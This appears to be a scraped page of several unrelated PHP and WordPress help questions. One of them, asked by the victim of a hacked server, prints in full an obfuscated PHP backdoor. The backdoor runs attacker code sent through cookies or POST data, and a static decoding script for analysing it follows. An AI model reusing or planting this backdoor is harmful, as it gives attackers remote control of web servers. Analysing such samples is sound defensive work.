web hosting – Why doesn’t my HTML PHP file upload form work on my website?

I have an HTML PHP website hosted on SiteGround, which I read somewhere uses UNIX servers. I created a file upload form for a job application webpage and I’ve tried every code example that I found online (that works for them but obviously not for me).

I even changed the folder and file permissions. Yet I still cannot manage to upload a simple PNG image file in testing. The tutorials and examples that I’ve found online are somewhat outdated.

Here is the code for the form.html file:

<!DOCTYPE html>
<html>
<body>
<form enctype="multipart/form-data" action="upload.php" method="post">
<p>Upload your file:</p>
<input type="file" name="uploaded_file">
<input type="submit" value="Upload">
</form>
</body>
</html>

Here is the code for the upload.php file:

<?php
$target_dir = "uploads/";
$target_file = $target_dir . basename($_FILES['uploaded_file']['name']);
if(move_uploaded_file($_FILES['uploaded_file']['tmp_name'],$path)){
    echo "The file ".  basename($_FILES['uploaded_file']['name']). " has been uploaded";
}
else{
    echo "Your file was unable to upload. Please try again.";
    $uploadOk = 0;
}
?>

I do have a folder named “uploads” in the same directory on the server.

php – I’ve heard the opinion that my code is making too many database queries

I’ve heard the opinion that my code is making too many database queries. Probably needs to move some code before sending the request, but I don’t know how.

        $this->data['reviews'] = Review::query()
        ->orderBy("id", 'desc')
        ->whereNotNull('published_at')
        ->with('answers')
        ->withCount([
            'likes as likesCount' => function (Builder $builder) {
                $builder
                    ->where('rating', AppReviewQuestionLike::LIKE);
            },
            'likes as dislikesCount' => function (Builder $builder) {
                $builder
                    ->where('rating', AppReviewQuestionLike::DISLIKE);
            },
        ])
        ->get()
        ->map(function (Review $review) {
            $customer_name = $review->customer->firstname . ' ' . mb_strimwidth($review->customer->lastname, 0, 2, '.');
            $anonymous_name = $review->anonymous == true ? 'ANONIM' : $customer_name;

            return [
                'id' => $review->id,
                'customer_id' => $review->customer->id,
                'customer_name' => $anonymous_name,
                'recommendation' => $review->recommendation,
                'rating' => $review->rating,
                'advantages' => $review->advantages,
                'flaws' => $review->flaws,
                'text' => $review->text,
                'type' => 'review',
                'product' => $review->product->title,
                'created_at' => $review->created_at->format('d-m-Y'),
                'likesCount' => $review->likesCount,
                'dislikesCount' => $review->dislikesCount,
                'answers' => $review->answers
                    ->whereNotNull('published_at')
                    ->map(function (Answer $answer) {
                        $customer_answer = $answer->customer->firstname . ' ' . mb_strimwidth($answer->customer->lastname, 0, 2, '.');
                        $anonymous_answer = $answer->anonymous == true ? 'ANONIM' : $customer_answer;

                        /** @var Review $interlocutor_message */
                        $interlocutor_message = Review::query()->find($answer->model_id);
                        $interlocutor = $interlocutor_message->customer->firstname . ' ' . mb_strimwidth($interlocutor_message->customer->lastname, 0, 2, '.');
                        $interlocutor_name = $interlocutor_message->anonymous == true ? 'ANONIM' : $interlocutor;
                        $interlocutor_prefix_message_id = 'review_';

                        return [
                            'id' => $answer->id,
                            'customer_id' => $answer->customer->id,
                            'customer_name' => $anonymous_answer,
                            'interlocutor_message_id' => $interlocutor_prefix_message_id . $answer->model_id,
                            'interlocutor_name' => $interlocutor_name,
                            'text' => $answer->text,
                            'type' => 'answer',
                            'created_at' => $answer->created_at->format('d-m-Y'),
                            'likesCount' => count($answer->likes->where('rating', AppReviewQuestionLike::LIKE)),
                            'dislikesCount' => count($answer->likes->where('rating', AppReviewQuestionLike::DISLIKE)),
                            'comments' => $answer->comments
                                ->whereNotNull('published_at')
                                ->map(function (AnswerComment $comment) {
                                    $customer_comment = $comment->customer->firstname . ' ' . mb_strimwidth($comment->customer->lastname, 0, 2, '.');
                                    $anonymous_comment = $comment->anonymous == true ? 'ANONIM' : $customer_comment;
                                    if ($comment->model_type == 'AppAnswer') {
                                        /** @var Answer $interlocutor_message */
                                        $interlocutor_message = Answer::query()->find($comment->model_id);
                                        $interlocutor = $interlocutor_message->customer->firstname . ' ' . mb_strimwidth($interlocutor_message->customer->lastname, 0, 2, '.');
                                        $interlocutor_name = $interlocutor_message->anonymous == true ? 'ANONIM' : $interlocutor;
                                        $interlocutor_prefix_message_id = 'answer_';
                                    }
                                    if ($comment->model_type == 'AppAnswerComment') {
                                        /** @var AnswerComment $interlocutor_message */
                                        $interlocutor_message = AnswerComment::query()->find($comment->model_id);
                                        $interlocutor = $interlocutor_message->customer->firstname . ' ' . mb_strimwidth($interlocutor_message->customer->lastname, 0, 2, '.');
                                        $interlocutor_name = $interlocutor_message->anonymous == true ? 'ANONIM' : $interlocutor;
                                        $interlocutor_prefix_message_id = 'comment_';
                                    }

                                    return [
                                        'id' => $comment->id,
                                        'customer_id' => $comment->customer->id,
                                        'answer_id' => $comment->answer_id,
                                        'interlocutor_message_id' => $interlocutor_prefix_message_id . $comment->model_id,
                                        'interlocutor_name' => $interlocutor_name,
                                        'customer_name' => $anonymous_comment,
                                        'text' => $comment->text,
                                        'type' => 'comment',
                                        'likesCount' => count($comment->likes->where('rating', AppReviewQuestionLike::LIKE)),
                                        'dislikesCount' => count($comment->likes->where('rating', AppReviewQuestionLike::DISLIKE)),
                                        'created_at' => $comment->created_at->format('d-m-Y'),
                                    ];
                                })->toArray(),
                        ];
                    })->toArray(),
            ];
        })->toArray();

How to speed up queries for 2m Datasets in PHP & Mysql

We have a SaaS Application site, where we would have over 2M records in a table.

Even with the indexes these queries are slow.

My Question:

  1. Our database query response is very slow in our PHP User Table page. It takes more than 4-5 mins to fetch the data. How can we improve the response time?
  2. Our login page also responds slowly when authenticating the user. How can we improve the performance?
  3. Isn’t our server good enough? Here are our specs (Dedicated Server XL6 managed. CPU. AMD Hexa-Core. 6 Cores x 2.8 GHz. (3.3 GHz Turbo Core). RAM. 16 GB. DDR3 ECC. HDD. 1,000 GB (2 x 1,000 SATA))
  4. Would separating this table/data onto another database on a server that has enough RAM to store this data in memory speed up these queries? Is there anything in the way that the tables/indexes are set up that we can improve upon to make these queries faster?

Table Structure

MySQL Table Information

Data    102.9   MiB
Index   10.2    MiB
Overhead    380 B
Effective   113.1   MiB
Total   113.1   MiB

Row statistics
Format  dynamic
Collation   latin1_swedish_ci
Rows    1,034,964
Row length  104 B
Row size    115 B

Simplify function to blend HTML into PHP

I’m always down to learn better ways of doing things and I wanted to see if I can get input from the community to see if there is a way that I can improve this function:

function pardot_dashboard_query()
{
    $args = [
        's'         => '<!-- wp:acf/pardot-form ',
        'sentence'  => 1,
        'post_type' => [
            'post',
            'page'
        ],
    ];
    $pardot_posts = get_posts($args);
    if (!$pardot_posts) {
        echo 'There are no active Pardot Forms.';
        return;
    }
    echo '<p>The Pardot Form is active on the following pages/posts:</p>'; ?>
    <ul>
        <?php foreach ($pardot_posts as $post): ?>
            <li><a href="<?= $post->guid ?>"><?= $post->post_title ?: 'No title available' ?><?= ' (' . ucfirst($post->post_type) . ')' ?></a></li>
        <?php endforeach; ?>
    </ul>
    <?php
}

If there are other means of output and/or ways to shrink it down – all help will be appreciated!

Using a custom plugin to capture input data via Ajax and PHP

I’m very new to WordPress, so please excuse my possible lack of understanding. I’m super comfortable with good old vanilla HTML/JS/CSS, and transitioning my hard coded site into WP. My old site had a lot of forms that I used Ajax to send input values over to a PHP script and output a response.

After reading through this site: https://www.smashingmagazine.com/2011/10/how-to-use-ajax-in-wordpress/ I began to understand the basics of how WP likes Ajax requests to be handled. However, the only thing this article left out was how to grab user input data.

So here’s my best explanation of what I’ve tried:

Front End Facing WP Page Code

<input type="text" id="data-to-submit"/>
<?php
  /////////////////////////////////////////////////////////////////////////
  ////PHP code was added to this WP page using PHP-Everwhere plugin //////
  ///////////////////////////////////////////////////////////////////////
  $nonce = wp_create_nonce("my_nonce");
  $link = admin_url('admin-ajax.php?action=my_price_request&nonce='.$nonce);
  echo '<a id="go" data-nonce="'.$nonce.'" href="' . $link . '">Submit</a>';
?>

Then I created a new plugin by going to my cPanel file manager and going to wp-content -> plugins then creating a new folder called myFormProcessor inside this folder I added the following two files:

File #1 myFormProcessor.php

<?php
/*
Plugin Name: myFormProcessor
*/

add_action("init", "my_script_enqueuer");
add_action("wp_ajax_my_price_request", "my_price_request");

function my_price_request(){

  if(!wp_verify_nonce( $_REQUEST['nonce'], "my_nonce")) {
   exit();
}

$result['type'] = 'success';
$result['data'] = $_REQUEST['data'];

if(!empty($_SERVER['HTTP_X_REQUESTED_WITH']) && strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) == 'xmlhttprequest') {
   $result = json_encode($result);
   echo $result;
}else{
  header("Location: ".$_SERVER["HTTP_REFERER"]);
}

die();
}

function my_script_enqueuer() {
   wp_register_script( "my_form_script", WP_PLUGIN_URL.'/myFormProcessor/my_form_ajax_script.js', array('jquery') );
   wp_localize_script( 'my_form_script', 'myAjax', array( 'ajaxurl' => admin_url( 'admin-ajax.php' )));        

   wp_enqueue_script('jquery');
   wp_enqueue_script('my_form_script');
}
?>

I realize the above file doesn’t really do anything. To debug this issue I’m just passing back the value I’m trying to grab from the user.

File #2 my_form_ajax_script.js

jQuery(document).ready( function() {

 jQuery("#go").click( function(e) {
  e.preventDefault(); 
  nonce = jQuery(this).attr("data-nonce");
  data = jQuery('#data-to-submit').val();  // <--- THIS IS THE VALUE I WANT TO PASS TO PHP

  jQuery.ajax({
     type : "post",
     dataType : "json",
     url : myAjax.ajaxurl,
     data : {action: "my_price_request", data : data, nonce: nonce},
     success: function(response) {
        if(response.type == "success") {
           alert(response.data);
        }else{
           alert("error occured");
        }
     },
     error: function (xhr, ajaxOptions, thrownError) {
        console.log(xhr.status);
        console.log(thrownError);
        alert('major error');
     }
  })   
 })
})

I activated the myFormProcessor plugin within WP and tested the page. Good news is most everything worked, no major errors. The only thing that didn’t work was obtaining the value from the input (id=’data-to-submit’). It’s only using the data included in the link produced in the frontend PHP. Can anyone tell me how to correct this?

php – delete a record with a modal alert on the same page

Good afternoon everyone, I hope you can help me with this problem. I have my function that deletes records, but when I want to call it from a I don't know how to tell it to show me a confirmation modal and then delete the record within the same page. Here is my code:

$alm = new Trabajo();
$model = new TrabajoModel();

    if(isset($_REQUEST['action']))
    {
        switch($_REQUEST['action'])
        {

            case 'eliminar':
                $model->Eliminar($_REQUEST['id']);
                header('Location: inicio.php');
                break;

            case 'editar':
                $alm = $model->Obtener($_REQUEST['id']);
                break;
        }
    }

Here I show the delete button in my table. I did it with JavaScript, but I want it to show me the modal, and if I accept it deletes the record, and if not it leaves me there.

<td><a href="?action=editar&id=<?php echo $dato['id']; ?>"><center><i class="fas fa-check-double"></i></center></a></td>
            <td><a onclick="return confirm('Confirma que deseas borrar este registro.');" href="?action=eliminar&id=<?php echo $dato['id']; ?>"><center><i class="far fa-trash-alt"></i></center></a></td>

wordpress – Suspicious php links found on cPanel visitors

I am facing a problem with my WordPress site. A number of visitors try to access a page that doesn’t even exist on my site. It keeps generating every minute with different random PHP links from different IPs. I installed Wordfence but those pages are not showing in the Wordfence traffic. Because of this my site bandwidth is increasing hugely.

Please refer to this screenshot.

I am also facing a number of IPs trying to access my wp-login page and xmlrpc page as well.

I don’t know where this came from and how to solve.

webserver – What does this potentially malicious php code do?

Somebody hacked my webserver and uploaded many of the following files with random names in different subdirectories of my webroot. The file looks something like this and – even though I managed to beautify it – I am unable to decipher the obfuscation.

I can see that potential code injection is happening using the $_POST and $_COOKIE variables, but what I find very interesting is the lack of any eval calls, the function is even deactivated in my php.ini.

Anyway here’s the code and I’d appreciate any kind of insights:

<?php
$wldxznb = 'r5a3m#uvplebgsH\'co*6i8-_7tx14nfk0yd';
$vcekj = Array();
$vcekj[] = $wldxznb[16] . $wldxznb[0] . $wldxznb[10] . $wldxznb[2] . $wldxznb[25] . $wldxznb[10] . $wldxznb[23] . $wldxznb[30] . $wldxznb[6] . $wldxznb[29] . $wldxznb[16] . $wldxznb[25] . $wldxznb[20] . $wldxznb[17] . $wldxznb[29];
$vcekj[] = $wldxznb[14] . $wldxznb[18];
$vcekj[] = $wldxznb[1] . $wldxznb[16] . $wldxznb[21] . $wldxznb[30] . $wldxznb[10] . $wldxznb[34] . $wldxznb[10] . $wldxznb[16] . $wldxznb[22] . $wldxznb[10] . $wldxznb[21] . $wldxznb[27] . $wldxznb[32] . $wldxznb[22] . $wldxznb[28] . $wldxznb[30] . $wldxznb[16] . $wldxznb[2] . $wldxznb[22] . $wldxznb[11] . $wldxznb[11] . $wldxznb[27] . $wldxznb[19] . $wldxznb[22] . $wldxznb[3] . $wldxznb[27] . $wldxznb[1] . $wldxznb[11] . $wldxznb[28] . $wldxznb[34] . $wldxznb[34] . $wldxznb[24] . $wldxznb[2] . $wldxznb[34] . $wldxznb[19] . $wldxznb[34];
$vcekj[] = $wldxznb[5];
$vcekj[] = $wldxznb[16] . $wldxznb[17] . $wldxznb[6] . $wldxznb[29] . $wldxznb[25];
$vcekj[] = $wldxznb[13] . $wldxznb[25] . $wldxznb[0] . $wldxznb[23] . $wldxznb[0] . $wldxznb[10] . $wldxznb[8] . $wldxznb[10] . $wldxznb[2] . $wldxznb[25];
$vcekj[] = $wldxznb[10] . $wldxznb[26] . $wldxznb[8] . $wldxznb[9] . $wldxznb[17] . $wldxznb[34] . $wldxznb[10];
$vcekj[] = $wldxznb[13] . $wldxznb[6] . $wldxznb[11] . $wldxznb[13] . $wldxznb[25] . $wldxznb[0];
$vcekj[] = $wldxznb[2] . $wldxznb[0] . $wldxznb[0] . $wldxznb[2] . $wldxznb[33] . $wldxznb[23] . $wldxznb[4] . $wldxznb[10] . $wldxznb[0] . $wldxznb[12] . $wldxznb[10];
$vcekj[] = $wldxznb[13] . $wldxznb[25] . $wldxznb[0] . $wldxznb[9] . $wldxznb[10] . $wldxznb[29];
$vcekj[] = $wldxznb[8] . $wldxznb[2] . $wldxznb[16] . $wldxznb[31];
foreach ($vcekj[8]($_COOKIE, $_POST) as $wxusr => $pjrusp)
{
    function wwdlf($vcekj, $wxusr, $qwdotr)
    {
        return $vcekj[7]($vcekj[5]($wxusr . $vcekj[2], ($qwdotr / $vcekj[9]($wxusr)) + 1) , 0, $qwdotr);
    }
    function irngfrj($vcekj, $axsex)
    {
        return @$vcekj[10]($vcekj[1], $axsex);
    }
    function vadod($vcekj, $axsex)
    {
        $onlwwe = $vcekj[4]($axsex) % 3;
        if (!$onlwwe)
        {
            $zznqw = $vcekj[0];
            $juptpoi = $zznqw("", $axsex[1]($axsex[2]));
            $juptpoi();
            exit();
        }
    }
    $pjrusp = irngfrj($vcekj, $pjrusp);
    vadod($vcekj, $vcekj[6]($vcekj[3], $pjrusp ^ wwdlf($vcekj, $wxusr, $vcekj[9]($pjrusp))));
}
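
A static way to read the lookup table in the sample above without running any of the PHP, added here as an example and not part of the original post. The assignment lines are copied from the sample with the PHP array brackets and the escaped quote written out; the names `decode_table`, `flag_code_exec` and `CODE_EXEC_SINKS` are this example's own.

```python
import re

# Assignment lines copied from the sample on this page; they are parsed, never executed.
SAMPLE = r"""
$wldxznb = 'r5a3m#uvplebgsH\'co*6i8-_7tx14nfk0yd';
$vcekj[] = $wldxznb[16] . $wldxznb[0] . $wldxznb[10] . $wldxznb[2] . $wldxznb[25] . $wldxznb[10] . $wldxznb[23] . $wldxznb[30] . $wldxznb[6] . $wldxznb[29] . $wldxznb[16] . $wldxznb[25] . $wldxznb[20] . $wldxznb[17] . $wldxznb[29];
$vcekj[] = $wldxznb[14] . $wldxznb[18];
$vcekj[] = $wldxznb[1] . $wldxznb[16] . $wldxznb[21] . $wldxznb[30] . $wldxznb[10] . $wldxznb[34] . $wldxznb[10] . $wldxznb[16] . $wldxznb[22] . $wldxznb[10] . $wldxznb[21] . $wldxznb[27] . $wldxznb[32] . $wldxznb[22] . $wldxznb[28] . $wldxznb[30] . $wldxznb[16] . $wldxznb[2] . $wldxznb[22] . $wldxznb[11] . $wldxznb[11] . $wldxznb[27] . $wldxznb[19] . $wldxznb[22] . $wldxznb[3] . $wldxznb[27] . $wldxznb[1] . $wldxznb[11] . $wldxznb[28] . $wldxznb[34] . $wldxznb[34] . $wldxznb[24] . $wldxznb[2] . $wldxznb[34] . $wldxznb[19] . $wldxznb[34];
$vcekj[] = $wldxznb[5];
$vcekj[] = $wldxznb[16] . $wldxznb[17] . $wldxznb[6] . $wldxznb[29] . $wldxznb[25];
$vcekj[] = $wldxznb[13] . $wldxznb[25] . $wldxznb[0] . $wldxznb[23] . $wldxznb[0] . $wldxznb[10] . $wldxznb[8] . $wldxznb[10] . $wldxznb[2] . $wldxznb[25];
$vcekj[] = $wldxznb[10] . $wldxznb[26] . $wldxznb[8] . $wldxznb[9] . $wldxznb[17] . $wldxznb[34] . $wldxznb[10];
$vcekj[] = $wldxznb[13] . $wldxznb[6] . $wldxznb[11] . $wldxznb[13] . $wldxznb[25] . $wldxznb[0];
$vcekj[] = $wldxznb[2] . $wldxznb[0] . $wldxznb[0] . $wldxznb[2] . $wldxznb[33] . $wldxznb[23] . $wldxznb[4] . $wldxznb[10] . $wldxznb[0] . $wldxznb[12] . $wldxznb[10];
$vcekj[] = $wldxznb[13] . $wldxznb[25] . $wldxznb[0] . $wldxznb[9] . $wldxznb[10] . $wldxznb[29];
$vcekj[] = $wldxznb[8] . $wldxznb[2] . $wldxznb[16] . $wldxznb[31];
"""

# PHP names that run a string or callable as code or as a shell command.
CODE_EXEC_SINKS = {"eval", "assert", "create_function", "call_user_func",
                   "call_user_func_array", "system", "exec", "shell_exec",
                   "passthru", "popen", "proc_open"}

ALPHABET_RE = re.compile(r"\$(\w+)\s*=\s*'((?:\\.|[^'\\])*)'\s*;")
PUSH_RE = re.compile(r"\$\w+\s*(?:\[\s*\]|\(\s*\))\s*=\s*(.*);$")


def decode_table(php_source):
    """Rebuild the string table from `$t[] = $alphabet[i] . $alphabet[j] ...` lines."""
    found = ALPHABET_RE.search(php_source)
    if not found:
        raise ValueError("no single-quoted alphabet assignment found")
    name = found.group(1)
    # Single-quoted PHP strings only treat \' and \\ as escapes.
    alphabet = re.sub(r"\\(['\\])", r"\1", found.group(2))
    # Accept [n] as well as (n), so a copy whose brackets were mangled still parses.
    index_re = re.compile(r"\$" + re.escape(name) + r"\s*[\[(]\s*(\d+)\s*[\])]")
    table = []
    for line in php_source.splitlines():
        push = PUSH_RE.match(line.strip())
        if push:
            table.append("".join(alphabet[int(i)] for i in index_re.findall(push.group(1))))
    return table


def flag_code_exec(table):
    """Return (slot, name) for every decoded entry that is a code-execution sink."""
    return [(slot, name) for slot, name in enumerate(table) if name.lower() in CODE_EXEC_SINKS]


if __name__ == "__main__":
    decoded = decode_table(SAMPLE)
    for slot, value in enumerate(decoded):
        print(f"[{slot:2}] {value}")
    print("code-execution sinks:", flag_code_exec(decoded))
```

Slot 0 decodes to `create_function`, which compiles a string into a callable, so the sample can run posted code without a literal `eval` call.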

php – Does adding a csv file to a wordpress plugin introduce security risks to the site?

I am currently working on an implementation reading data from a csv file from within a WordPress plugin. It was suggested the file be added within the plugin in an assets directory. I have concerns in doing this. In particular, I’m worried about security and whether this makes the site vulnerable to attacks.

That being said, I looked at the assets folder in the frontend on my local environment and was not able to see the csv file.

Does anyone know if adding a csv file directly to a plugin introduces security risks?

php – Problem manipulating a blob

This is my first question here; if something is wrong or information is missing, please let me know so I can correct it.

Explanation:

I have a db where I load images as blobs and I want to convert them all to jpeg, named by id, so that displaying them is not so heavy.

Currently it is almost impossible to view the gallery hahaha

I would leave code, but I really don't have any.
I need help taking the blobs I retrieve, converting them to jpeg and saving them in a folder on the server named by id.

If anyone can give me a hand, I would appreciate it.

Thanks.